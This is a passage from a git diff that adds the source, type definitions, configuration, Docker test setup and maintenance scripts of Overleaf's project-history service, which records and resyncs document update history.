+ // Replace high and low surrogate characters with 'replacement character' (\uFFFD) + const removeBadChars = str => str.replace(/[\uD800-\uDFFF]/g, '\uFFFD') + // clean up any bad chars in resync diffs + if (update.op) { + for (const op of update.op) { + if (op.i != null) { + op.i = removeBadChars(op.i) + } + } + } + // clean up any bad chars in resync new docs + if (update.docLines != null) { + update.docLines = removeBadChars(update.docLines) + } + return update +} + +export const promises = { + /** @type {(projectId: string) => Promise<number>} */ + processUpdatesForProject: promisify(processUpdatesForProject), + /** @type {(projectId: string, opts: any) => Promise<number>} */ + startResyncAndProcessUpdatesUnderLock: promisify( + startResyncAndProcessUpdatesUnderLock + ), +} diff --git a/services/project-history/app/js/Utils.js b/services/project-history/app/js/Utils.js new file mode 100644 index 0000000..9158b28 --- /dev/null +++ b/services/project-history/app/js/Utils.js @@ -0,0 +1,37 @@ +// @ts-check + +/** + * @import { CommentOp, DeleteOp, InsertOp, Op, RetainOp } from './types' + */ + +/** + * @param {Op} op + * @returns {op is InsertOp} + */ +export function isInsert(op) { + return 'i' in op && op.i != null +} + +/** + * @param {Op} op + * @returns {op is RetainOp} + */ +export function isRetain(op) { + return 'r' in op && op.r != null +} + +/** + * @param {Op} op + * @returns {op is DeleteOp} + */ +export function isDelete(op) { + return 'd' in op && op.d != null +} + +/** + * @param {Op} op + * @returns {op is CommentOp} + */ +export function isComment(op) { + return 'c' in op && op.c != null && 't' in op && op.t != null +} diff --git a/services/project-history/app/js/Validation.js b/services/project-history/app/js/Validation.js new file mode 100644 index 0000000..846cc12 --- /dev/null +++ b/services/project-history/app/js/Validation.js @@ -0,0 +1,12 @@ +import { celebrate, errors } from 'celebrate' + +export { Joi } from 'celebrate' + +export const errorMiddleware = errors() + +/** + * Validation middleware + */ +export function validate(schema) { + return celebrate(schema, { allowUnknown: true }) +} diff --git a/services/project-history/app/js/Versions.js b/services/project-history/app/js/Versions.js new file mode 100644 index 0000000..0733b20 --- /dev/null +++ b/services/project-history/app/js/Versions.js @@ -0,0 +1,68 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
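+
+// Illustrative examples (not part of the source) for the helpers below, which
+// compare dotted version strings numerically rather than lexicographically:
+//   compare('1.2', '4.1') // -1
+//   gt('1.10', '1.9') // true: 10 > 9 numerically, though '1.10' < '1.9' as strings
+//   gte(3, 3) // true: plain integers are compared directly
+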
+// Compare Versions like 1.2 < 4.1
+
+const convertToArray = v => v.split('.').map(x => parseInt(x, 10))
+
+const cmp = function (v1, v2) {
+  // allow comparison to work with integers
+  if (typeof v1 === 'number' && typeof v2 === 'number') {
+    if (v1 > v2) {
+      return +1
+    }
+    if (v1 < v2) {
+      return -1
+    }
+    // otherwise equal
+    return 0
+  }
+  // comparison with strings
+  v1 = convertToArray(v1)
+  v2 = convertToArray(v2)
+  while (v1.length || v2.length) {
+    const x = v1.shift()
+    const y = v2.shift()
+    if (x > y) {
+      return +1
+    }
+    if (x < y) {
+      return -1
+    }
+    if (x != null && y == null) {
+      return +1
+    }
+    if (x == null && y != null) {
+      return -1
+    }
+  }
+  return 0
+}
+
+export function compare(v1, v2) {
+  return cmp(v1, v2)
+}
+
+export function gt(v1, v2) {
+  return cmp(v1, v2) > 0
+}
+
+export function lt(v1, v2) {
+  return cmp(v1, v2) < 0
+}
+
+export function gte(v1, v2) {
+  return cmp(v1, v2) >= 0
+}
+
+export function lte(v1, v2) {
+  return cmp(v1, v2) <= 0
+}
diff --git a/services/project-history/app/js/WebApiManager.js b/services/project-history/app/js/WebApiManager.js
new file mode 100644
index 0000000..2697db2
--- /dev/null
+++ b/services/project-history/app/js/WebApiManager.js
@@ -0,0 +1,112 @@
+import { callbackify } from 'node:util'
+import { setTimeout } from 'node:timers/promises'
+import logger from '@overleaf/logger'
+import Metrics from '@overleaf/metrics'
+import Settings from '@overleaf/settings'
+import {
+  fetchNothing,
+  fetchJson,
+  RequestFailedError,
+} from '@overleaf/fetch-utils'
+import * as Errors from './Errors.js'
+import * as RedisManager from './RedisManager.js'
+
+let RETRY_TIMEOUT_MS = 5000
+
+async function getHistoryId(projectId) {
+  Metrics.inc('history_id_cache_requests_total')
+  const cachedHistoryId =
+    await RedisManager.promises.getCachedHistoryId(projectId)
+  if (cachedHistoryId) {
+    Metrics.inc('history_id_cache_hits_total')
+    return cachedHistoryId
+  } else {
+    const project = await _getProjectDetails(projectId)
+    const historyId =
+      project.overleaf &&
+      project.overleaf.history &&
+      project.overleaf.history.id
+    if (historyId != null) {
+      await RedisManager.promises.setCachedHistoryId(projectId, historyId)
+    }
+    return historyId
+  }
+}
+
+async function requestResync(projectId, opts = {}) {
+  try {
+    const body = {}
+    if (opts.historyRangesMigration) {
+      body.historyRangesMigration = opts.historyRangesMigration
+    }
+    if (opts.resyncProjectStructureOnly) {
+      body.resyncProjectStructureOnly = opts.resyncProjectStructureOnly
+    }
+    await fetchNothing(
+      `${Settings.apis.web.url}/project/${projectId}/history/resync`,
+      {
+        method: 'POST',
+        signal: AbortSignal.timeout(6 * 60000),
+        basicAuth: {
+          user: Settings.apis.web.user,
+          password: Settings.apis.web.pass,
+        },
+        json: body,
+      }
+    )
+  } catch (err) {
+    if (err instanceof RequestFailedError && err.response.status === 404) {
+      throw new Errors.NotFoundError('got a 404 from web api').withCause(err)
+    } else {
+      throw err
+    }
+  }
+}
+
+async function _getProjectDetails(projectId) {
+  logger.debug({ projectId }, 'getting project details from web')
+  let attempts = 0
+  while (true) {
+    attempts += 1
+    try {
+      return await fetchJson(
`${Settings.apis.web.url}/project/${projectId}/details`, + { + signal: AbortSignal.timeout(16000), + basicAuth: { + user: Settings.apis.web.user, + password: Settings.apis.web.pass, + }, + } + ) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + throw new Errors.NotFoundError('got a 404 from web api').withCause(err) + } else if (attempts < 2) { + // retry after 5 seconds + await setTimeout(RETRY_TIMEOUT_MS) + } else { + throw err + } + } + } +} + +/** + * Adjust the retry timeout in tests + */ +export async function setRetryTimeoutMs(timeoutMs) { + RETRY_TIMEOUT_MS = timeoutMs +} + +// EXPORTS + +const getHistoryIdCb = callbackify(getHistoryId) +const requestResyncCb = callbackify(requestResync) + +export { getHistoryIdCb as getHistoryId, requestResyncCb as requestResync } + +export const promises = { + getHistoryId, + requestResync, +} diff --git a/services/project-history/app/js/mongo-types.ts b/services/project-history/app/js/mongo-types.ts new file mode 100644 index 0000000..9894e65 --- /dev/null +++ b/services/project-history/app/js/mongo-types.ts @@ -0,0 +1,22 @@ +import { ObjectId } from 'mongodb-legacy' + +export type ProjectHistoryFailure = { + _id: ObjectId + project_id: string + attempts: number + resyncAttempts: number + resyncStartedAt: Date + requestCount?: number + history: (ErrorRecord | SyncStartRecord)[] +} & ErrorRecord + +type ErrorRecord = { + error: string + stack: string + queueSize: number + ts: Date +} + +type SyncStartRecord = { + resyncStartedAt: Date +} diff --git a/services/project-history/app/js/mongodb.js b/services/project-history/app/js/mongodb.js new file mode 100644 index 0000000..d639903 --- /dev/null +++ b/services/project-history/app/js/mongodb.js @@ -0,0 +1,27 @@ +import Metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import mongodb from 'mongodb-legacy' +const { MongoClient, ObjectId } = mongodb + +/** + * @import { ProjectHistoryFailure } from './mongo-types.ts' + */ + +export { ObjectId } + +export const mongoClient = new MongoClient( + Settings.mongo.url, + Settings.mongo.options +) +const mongoDb = mongoClient.db() + +Metrics.mongodb.monitor(mongoClient) + +export const db = { + deletedProjects: mongoDb.collection('deletedProjects'), + projects: mongoDb.collection('projects'), + /** @type {mongodb.Collection<ProjectHistoryFailure>} */ + projectHistoryFailures: mongoDb.collection('projectHistoryFailures'), + projectHistoryLabels: mongoDb.collection('projectHistoryLabels'), + projectHistorySyncState: mongoDb.collection('projectHistorySyncState'), +} diff --git a/services/project-history/app/js/server.js b/services/project-history/app/js/server.js new file mode 100644 index 0000000..4f13198 --- /dev/null +++ b/services/project-history/app/js/server.js @@ -0,0 +1,61 @@ +import Metrics from '@overleaf/metrics' +import logger from '@overleaf/logger' +import express from 'express' +import bodyParser from 'body-parser' +import * as Errors from './Errors.js' +import * as Router from './Router.js' +import * as Validation from './Validation.js' + +const HistoryLogger = logger.initialize('project-history').logger + +Metrics.event_loop.monitor(logger) +Metrics.memory.monitor(logger) +Metrics.leaked_sockets.monitor(logger) +Metrics.open_sockets.monitor() + +// log updates as truncated strings +function truncateFn(updates) { + return JSON.parse( + JSON.stringify(updates, function (key, value) { + let len + if (typeof value === 'string' && (len = value.length) > 80) { + return ( + 
value.substr(0, 32) + + `...(message of length ${len} truncated)...` + + value.substr(-32) + ) + } else { + return value + } + }) + ) +} + +HistoryLogger.addSerializers({ + rawUpdate: truncateFn, + rawUpdates: truncateFn, + newUpdates: truncateFn, + lastUpdate: truncateFn, +}) + +export const app = express() +app.use(bodyParser.json()) +app.use(bodyParser.urlencoded({ extended: true })) +app.use(Metrics.http.monitor(logger)) +Router.initialize(app) +Metrics.injectMetricsRoute(app) +app.use(Validation.errorMiddleware) +app.use(function (error, req, res, next) { + if (error instanceof Errors.NotFoundError) { + res.sendStatus(404) + } else if (error instanceof Errors.BadRequestError) { + res.sendStatus(400) + } else if (error instanceof Errors.InconsistentChunkError) { + res.sendStatus(422) + } else if (error instanceof Errors.TooManyRequestsError) { + res.status(429).set('Retry-After', 300).end() + } else { + logger.error({ err: error, req }, error.message) + res.status(500).json({ message: 'an internal error occurred' }) + } +}) diff --git a/services/project-history/app/js/types.ts b/services/project-history/app/js/types.ts new file mode 100644 index 0000000..c2b0d83 --- /dev/null +++ b/services/project-history/app/js/types.ts @@ -0,0 +1,253 @@ +import { HistoryRanges } from '../../../document-updater/app/js/types' +import { LinkedFileData, RawOrigin } from 'overleaf-editor-core/lib/types' + +export type Update = + | TextUpdate + | AddDocUpdate + | AddFileUpdate + | RenameUpdate + | DeleteCommentUpdate + | SetCommentStateUpdate + | SetFileMetadataOperation + | ResyncProjectStructureUpdate + | ResyncDocContentUpdate + +export type ProjectStructureUpdate = + | AddDocUpdate + | AddFileUpdate + | RenameUpdate + | SetFileMetadataOperation + +export type UpdateMeta = { + user_id: string + ts: number + source?: string + type?: string + origin?: RawOrigin + tc?: string + resync?: boolean +} + +export type TextUpdate = { + doc: string + op: Op[] + v: number + meta: UpdateMeta & { + pathname: string + doc_length: number + doc_hash?: string + history_doc_length?: number + } +} + +export type SetCommentStateUpdate = { + pathname: string + commentId: string + resolved: boolean + meta: UpdateMeta +} + +export type SetFileMetadataOperation = { + pathname: string + meta: UpdateMeta + metadata: LinkedFileData | object +} + +export type DeleteCommentUpdate = { + pathname: string + deleteComment: string + meta: UpdateMeta +} + +type ProjectUpdateBase = { + version: string + projectHistoryId: string + meta: UpdateMeta + doc: string +} + +export type AddDocUpdate = ProjectUpdateBase & { + pathname: string + docLines: string + ranges?: HistoryRanges +} + +export type AddFileUpdate = ProjectUpdateBase & { + pathname: string + file: string + url: string + hash: string + createdBlob?: boolean + metadata?: LinkedFileData +} + +export type RenameUpdate = ProjectUpdateBase & { + pathname: string + new_pathname: string +} + +export type ResyncProjectStructureUpdate = { + resyncProjectStructure: { + docs: Doc[] + files: File[] + } + projectHistoryId: string + meta: { + ts: string + } + // optional fields for resyncProjectStructureOnly=true + resyncProjectStructureOnly?: boolean + _raw: string +} + +export type ResyncDocContentUpdate = { + resyncDocContent: { + content: string + version: number + ranges?: Ranges + resolvedCommentIds?: string[] + } + projectHistoryId: string + path: string + doc: string + meta: { + ts: string + } +} + +export type Op = RetainOp | InsertOp | DeleteOp | CommentOp + +export type RetainOp = { 
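+  // Illustrative (not from the source): e.g. { r: 'abc', p: 10 } retains the
+  // text 'abc' at position 10.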
+ r: string + p: number + hpos?: number + tracking?: TrackingDirective +} + +export type InsertOp = { + i: string + p: number + u?: boolean + hpos?: number + trackedDeleteRejection?: boolean + commentIds?: string[] +} + +export type DeleteOp = { + d: string + p: number + u?: boolean + hpos?: number + trackedChanges?: TrackedChangesInsideDelete[] +} + +export type TrackedChangesInsideDelete = { + type: 'insert' | 'delete' + offset: number + length: number +} + +export type CommentOp = { + c: string + p: number + t: string + hpos?: number + hlen?: number + resolved?: boolean +} + +export type UpdateWithBlob<T extends Update = Update> = { + update: T + blobHashes: T extends AddDocUpdate | AddFileUpdate + ? { + file: string + ranges?: string + } + : never +} + +export type TrackingProps = { + type: 'insert' | 'delete' + userId: string + ts: string +} + +export type TrackingDirective = TrackingProps | { type: 'none' } + +export type TrackingType = 'insert' | 'delete' | 'none' + +export type RawScanOp = + | number + | string + | { r: number; tracking?: TrackingDirective } + | { i: string; tracking?: TrackingProps; commentIds?: string[] } + | { d: number } + +export type TrackedChangeSnapshot = { + op: { + p: number + } & ({ d: string } | { i: string }) + metadata: { + ts: string + user_id: string + } +} + +export type CommentSnapshot = { + op: { + p: number + t: string + c: string + resolved: boolean + } +} + +export type RangesSnapshot = { + changes: TrackedChangeSnapshot[] + comments: CommentSnapshot[] +} + +export type Doc = { + doc: string + path: string +} + +export type File = { + file: string + url?: string + path: string + _hash?: string + createdBlob?: boolean + metadata?: LinkedFileData +} + +export type Entity = Doc | File + +export type Ranges = { + comments?: Comment[] + changes?: TrackedChange[] +} + +export type Comment = { + id: string + op: CommentOp + metadata: { + user_id: string + ts: string + } +} + +export type TrackedChange = { + id: string + op: InsertOp | DeleteOp + metadata: { + user_id: string + ts: string + } +} + +export type TrackedChangeTransition = { + pos: number + tracking: TrackingDirective + stage: 'persisted' | 'expected' +} diff --git a/services/project-history/buildscript.txt b/services/project-history/buildscript.txt new file mode 100644 index 0000000..be5e751 --- /dev/null +++ b/services/project-history/buildscript.txt @@ -0,0 +1,9 @@ +project-history +--dependencies=mongo,redis +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker +--env-add= +--env-pass-through= +--esmock-loader=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/services/project-history/config/settings.defaults.cjs b/services/project-history/config/settings.defaults.cjs new file mode 100644 index 0000000..9e5a398 --- /dev/null +++ b/services/project-history/config/settings.defaults.cjs @@ -0,0 +1,109 @@ +const http = require('node:http') +const https = require('node:https') + +http.globalAgent.keepAlive = false +https.globalAgent.keepAlive = false + +module.exports = { + mongo: { + url: + process.env.MONGO_CONNECTION_STRING || + `mongodb://${process.env.MONGO_HOST || '127.0.0.1'}/sharelatex`, + options: { + monitorCommands: true, + }, + }, + internal: { + history: { + port: 3054, + host: process.env.LISTEN_ADDRESS || '127.0.0.1', + }, + }, + apis: { + documentupdater: { + url: `http://${process.env.DOCUPDATER_HOST || '127.0.0.1'}:3003`, + }, + docstore: { + url: `http://${process.env.DOCSTORE_HOST || '127.0.0.1'}:3016`, + }, + filestore: { + 
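+      // Note: filestore reads stay enabled unless FILESTORE_ENABLED is set to
+      // the exact string 'false'.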
enabled: process.env.FILESTORE_ENABLED !== 'false', + url: `http://${process.env.FILESTORE_HOST || '127.0.0.1'}:3009`, + }, + web: { + url: `http://${ + process.env.WEB_API_HOST || process.env.WEB_HOST || '127.0.0.1' + }:${process.env.WEB_PORT || 3000}`, + user: process.env.WEB_API_USER || 'overleaf', + pass: process.env.WEB_API_PASSWORD || 'password', + historyIdCacheSize: parseInt( + process.env.HISTORY_ID_CACHE_SIZE || '10000', + 10 + ), + }, + project_history: { + url: `http://${process.env.PROJECT_HISTORY_HOST || '127.0.0.1'}:3054`, + }, + }, + redis: { + lock: { + host: process.env.REDIS_HOST || '127.0.0.1', + password: process.env.REDIS_PASSWORD, + port: process.env.REDIS_PORT || 6379, + key_schema: { + projectHistoryLock({ project_id: projectId }) { + return `ProjectHistoryLock:{${projectId}}` + }, + }, + }, + project_history: { + host: + process.env.HISTORY_REDIS_HOST || process.env.REDIS_HOST || '127.0.0.1', + port: process.env.HISTORY_REDIS_PORT || process.env.REDIS_PORT || 6379, + password: + process.env.HISTORY_REDIS_PASSWORD || process.env.REDIS_PASSWORD, + key_schema: { + projectHistoryOps({ project_id: projectId }) { + return `ProjectHistory:Ops:{${projectId}}` + }, + projectHistoryFirstOpTimestamp({ project_id: projectId }) { + return `ProjectHistory:FirstOpTimestamp:{${projectId}}` + }, + projectHistoryCachedHistoryId({ project_id: projectId }) { + return `ProjectHistory:CachedHistoryId:{${projectId}}` + }, + }, + }, + }, + + history: { + healthCheck: { + project_id: process.env.HEALTH_CHECK_PROJECT_ID || '', + }, + }, + + overleaf: { + history: { + host: + process.env.V1_HISTORY_FULL_HOST || + `http://${ + process.env.V1_HISTORY_HOST || + process.env.HISTORY_V1_HOST || + '127.0.0.1' + }:3100/api`, + user: process.env.V1_HISTORY_USER || 'staging', + pass: process.env.V1_HISTORY_PASSWORD || 'password', + sync: { + retries_max: 30, + interval: 2, + }, + requestTimeout: parseInt(process.env.V1_REQUEST_TIMEOUT || '300000', 10), + }, + }, + + path: { + uploadFolder: process.env.UPLOAD_FOLDER || '/tmp/', + }, + + maxFileSizeInBytes: 100 * 1024 * 1024, // 100 megabytes +} diff --git a/services/project-history/docker-compose.ci.yml b/services/project-history/docker-compose.ci.yml new file mode 100644 index 0000000..6deaad4 --- /dev/null +++ b/services/project-history/docker-compose.ci.yml @@ -0,0 +1,65 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + user: node + command: npm run test:unit:_run + environment: + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + + + test_acceptance: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + depends_on: + mongo: + condition: service_started + redis: + condition: service_healthy + user: node + command: npm run test:acceptance + + + tar: + build: . + image: ci/$PROJECT_NAME:$BRANCH_NAME-$BUILD_NUMBER + volumes: + - ./:/tmp/build/ + command: tar -czf /tmp/build/build.tar.gz --exclude=build.tar.gz --exclude-vcs . 
+ user: root + redis: + image: redis + healthcheck: + test: ping="$$(redis-cli ping)" && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 diff --git a/services/project-history/docker-compose.yml b/services/project-history/docker-compose.yml new file mode 100644 index 0000000..deed9c5 --- /dev/null +++ b/services/project-history/docker-compose.yml @@ -0,0 +1,69 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +version: "2.3" + +services: + test_unit: + image: node:20.18.2 + volumes: + - .:/overleaf/services/project-history + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/project-history + environment: + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + command: npm run --silent test:unit + user: node + + test_acceptance: + image: node:20.18.2 + volumes: + - .:/overleaf/services/project-history + - ../../node_modules:/overleaf/node_modules + - ../../libraries:/overleaf/libraries + working_dir: /overleaf/services/project-history + environment: + ELASTIC_SEARCH_DSN: es:9200 + REDIS_HOST: redis + HISTORY_REDIS_HOST: redis + QUEUES_REDIS_HOST: redis + ANALYTICS_QUEUES_REDIS_HOST: redis + MONGO_HOST: mongo + POSTGRES_HOST: postgres + MOCHA_GREP: ${MOCHA_GREP} + LOG_LEVEL: ${LOG_LEVEL:-} + NODE_ENV: test + NODE_OPTIONS: "--unhandled-rejections=strict" + user: node + depends_on: + mongo: + condition: service_started + redis: + condition: service_healthy + command: npm run --silent test:acceptance + + redis: + image: redis + healthcheck: + test: ping=$$(redis-cli ping) && [ "$$ping" = 'PONG' ] + interval: 1s + retries: 20 + + mongo: + image: mongo:6.0.13 + command: --replSet overleaf + volumes: + - ../../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. 
+ - mongo:127.0.0.1 + diff --git a/services/project-history/package.json b/services/project-history/package.json new file mode 100644 index 0000000..2a54a80 --- /dev/null +++ b/services/project-history/package.json @@ -0,0 +1,53 @@ +{ + "name": "@overleaf/project-history", + "description": "An API for saving and compressing individual document updates into a browseable history", + "private": true, + "main": "app.js", + "type": "module", + "scripts": { + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "start": "node app.js", + "nodemon": "node --watch app.js", + "test:acceptance:_run": "LOG_LEVEL=fatal mocha --loader=esmock --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:unit:_run": "LOG_LEVEL=fatal mocha --loader=esmock --recursive --reporter spec $@ test/unit/js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "aws-sdk": "^2.650.0", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "celebrate": "^15.0.3", + "diff-match-patch": "overleaf/diff-match-patch#89805f9c671a77a263fc53461acd62aa7498f688", + "esmock": "^2.6.3", + "express": "^4.21.2", + "lodash": "^4.17.20", + "minimist": "^1.2.8", + "mongodb-legacy": "6.1.3", + "overleaf-editor-core": "*", + "p-queue": "^8.1.0", + "request": "^2.88.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "nock": "^13.5.3", + "sinon": "~9.0.1", + "sinon-chai": "^3.7.0", + "timekeeper": "2.2.0", + "typescript": "^5.0.4" + } +} diff --git a/services/project-history/scripts/add_index_for_sync_state.js b/services/project-history/scripts/add_index_for_sync_state.js new file mode 100644 index 0000000..0c17197 --- /dev/null +++ b/services/project-history/scripts/add_index_for_sync_state.js @@ -0,0 +1,21 @@ +/* eslint-env mongo */ + +// add a TTL index to expire entries for completed resyncs in the +// projectHistorySyncState collection. The entries should only be expired if +// resyncProjectStructure is false and resyncDocContents is a zero-length array. 
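+//
+// Illustrative note (not from the source): with expireAfterSeconds: 0,
+// MongoDB's TTL monitor deletes a document once the date in its indexed
+// expiresAt field has passed, so the updateMany below schedules completed
+// resync records for removal roughly 24 hours from now.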
+
+const now = Date.now()
+const inTheFuture = now + 24 * 3600 * 1000
+
+db.projectHistorySyncState.createIndex(
+  { expiresAt: 1 },
+  { expireAfterSeconds: 0, background: true }
+)
+db.projectHistorySyncState.updateMany(
+  {
+    resyncProjectStructure: false,
+    resyncDocContents: [],
+    expiresAt: { $exists: false },
+  },
+  { $set: { expiresAt: new Date(inTheFuture) } }
+)
diff --git a/services/project-history/scripts/bulk_resync_file_fix_up.mjs b/services/project-history/scripts/bulk_resync_file_fix_up.mjs
new file mode 100644
index 0000000..10ea18b
--- /dev/null
+++ b/services/project-history/scripts/bulk_resync_file_fix_up.mjs
@@ -0,0 +1,328 @@
+// @ts-check
+import Events from 'node:events'
+import { setTimeout } from 'node:timers/promises'
+import readline from 'node:readline'
+import fs from 'node:fs'
+import minimist from 'minimist'
+import { ObjectId } from 'mongodb'
+import { batchedUpdate } from '@overleaf/mongo-utils/batchedUpdate.js'
+import logger from '@overleaf/logger'
+import Metrics from '@overleaf/metrics'
+import OError from '@overleaf/o-error'
+import { promiseMapWithLimit } from '@overleaf/promise-utils'
+import { db, mongoClient } from '../app/js/mongodb.js'
+import * as HistoryStoreManager from '../app/js/HistoryStoreManager.js'
+import * as RedisManager from '../app/js/RedisManager.js'
+import * as SyncManager from '../app/js/SyncManager.js'
+import * as UpdatesProcessor from '../app/js/UpdatesProcessor.js'
+import { NeedFullProjectStructureResyncError } from '../app/js/Errors.js'
+import * as ErrorRecorder from '../app/js/ErrorRecorder.js'
+
+// Silence warning.
+Events.setMaxListeners(20)
+
+// Enable caching for ObjectId.toString()
+ObjectId.cacheHexString = true
+
+const READ_CONCURRENCY = parseInt(process.env.READ_CONCURRENCY || '100', 10)
+const WRITE_CONCURRENCY = parseInt(process.env.WRITE_CONCURRENCY || '10', 10)
+const FLUSH_RETRIES = parseInt(process.env.FLUSH_RETRIES || '20', 10)
+
+// Relevant dates:
+// - 2024-12-19, start of event-hold removal in filestore bucket -> objects older than 24h are (soft-)deleted.
+// - 2024-12-23, copy operation skipped in filestore when cloning project -> objects not created on clone.
+// - 2025-01-24, no more filestore reads allowed in project-history -> no more empty files in history for 404s +const FILESTORE_SOFT_DELETE_START = new Date('2024-12-19T00:00:00Z') +const FILESTORE_READ_OFF = new Date('2025-01-24T15:00:00Z') + +const argv = minimist(process.argv.slice(2), { + string: ['logs', 'log-latency'], +}) +const LOG_LATENCY = argv['log-latency'] === 'true' + +let gracefulShutdownInitiated = false + +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + gracefulShutdownInitiated = true + console.warn('graceful shutdown initiated, draining queue') +} + +const STATS = { + processedLines: 0, + success: 0, + changed: 0, + failure: 0, + skipped: 0, + checkFailure: 0, +} + +function logStats() { + console.log( + JSON.stringify({ + time: new Date(), + gracefulShutdownInitiated, + ...STATS, + }) + ) +} +const logInterval = setInterval(logStats, 10_000) + +/** + * @typedef {Object} FileRef + * @property {ObjectId} _id + * @property {any} linkedFileData + */ + +/** + * @typedef {Object} Folder + * @property {Array<Folder>} folders + * @property {Array<FileRef>} fileRefs + */ + +/** + * @typedef {Object} Project + * @property {ObjectId} _id + * @property {Date} lastUpdated + * @property {Array<Folder>} rootFolder + * @property {{history: {id: (number|string)}}} overleaf + */ + +/** + * @param {Folder} folder + * @return {boolean} + */ +function checkFileTreeNeedsResync(folder) { + if (!folder) return false + if (Array.isArray(folder.fileRefs)) { + for (const fileRef of folder.fileRefs) { + if (fileRef.linkedFileData) return true + if (fileRef._id.getTimestamp() > FILESTORE_SOFT_DELETE_START) return true + } + } + if (Array.isArray(folder.folders)) { + for (const child of folder.folders) { + if (checkFileTreeNeedsResync(child)) return true + } + } + return false +} + +/** + * @param {string} projectId + * @param {string} historyId + * @return {Promise<Date>} + */ +async function getLastEndTimestamp(projectId, historyId) { + const raw = await HistoryStoreManager.promises.getMostRecentVersionRaw( + projectId, + historyId, + { readOnly: true } + ) + if (!raw) throw new Error('bug: history not initialized') + return raw.endTimestamp +} + +/** @type {Record<string, (project: Project) => Promise<boolean>>} */ +const conditions = { + // cheap: in-memory mongo lookup + 'updated after filestore soft-delete': async function (project) { + return project.lastUpdated > FILESTORE_SOFT_DELETE_START + }, + // cheap: in-memory mongo lookup + 'file-tree requires re-sync': async function (project) { + return checkFileTreeNeedsResync(project.rootFolder?.[0]) + }, + // moderate: GET from Redis + 'has pending operations': async function (project) { + const n = await RedisManager.promises.countUnprocessedUpdates( + project._id.toString() + ) + return n > 0 + }, + // expensive: GET from Mongo/Postgres via history-v1 HTTP API call + 'has been flushed after filestore soft-delete': async function (project) { + // Resyncs started after soft-deleting can trigger 404s and result in empty files. 
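+    // Illustrative reading (not from the source): getLastEndTimestamp above
+    // returns the endTimestamp of the project's most recent history chunk, so
+    // a value past FILESTORE_SOFT_DELETE_START means the project was flushed
+    // while filestore objects may already have been soft-deleted.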
+ const endTimestamp = await getLastEndTimestamp( + project._id.toString(), + project.overleaf.history.id.toString() + ) + return endTimestamp > FILESTORE_SOFT_DELETE_START + }, +} + +/** + * @param {Project} project + * @return {Promise<{projectId: string, historyId: string} | null>} + */ +async function checkProject(project) { + if (gracefulShutdownInitiated) return null + if (project._id.getTimestamp() > FILESTORE_READ_OFF) { + STATS.skipped++ // Project created after all bugs were fixed. + return null + } + const projectId = project._id.toString() + const historyId = project.overleaf.history.id.toString() + for (const [condition, check] of Object.entries(conditions)) { + try { + if (await check(project)) return { projectId, historyId } + } catch (err) { + logger.err({ projectId, condition, err }, 'failed to check project') + STATS.checkFailure++ + return null + } + } + STATS.skipped++ + return null +} + +/** + * @param {string} projectId + * @param {string} historyId + * @return {Promise<void>} + */ +async function processProject(projectId, historyId) { + if (gracefulShutdownInitiated) return + const t0 = performance.now() + try { + await tryProcessProject(projectId, historyId) + const latency = performance.now() - t0 + if (LOG_LATENCY) { + logger.info({ projectId, historyId, latency }, 'processed project') + } + STATS.success++ + } catch (err) { + logger.err({ err, projectId, historyId }, 'failed to process project') + STATS.failure++ + } +} + +/** + * @param {string} projectId + * @return {Promise<void>} + */ +async function flushWithRetries(projectId) { + for (let attempt = 0; attempt < FLUSH_RETRIES; attempt++) { + try { + await UpdatesProcessor.promises.processUpdatesForProject(projectId) + return + } catch (err) { + logger.warn( + { projectId, err, attempt }, + 'failed to flush updates, trying again' + ) + if 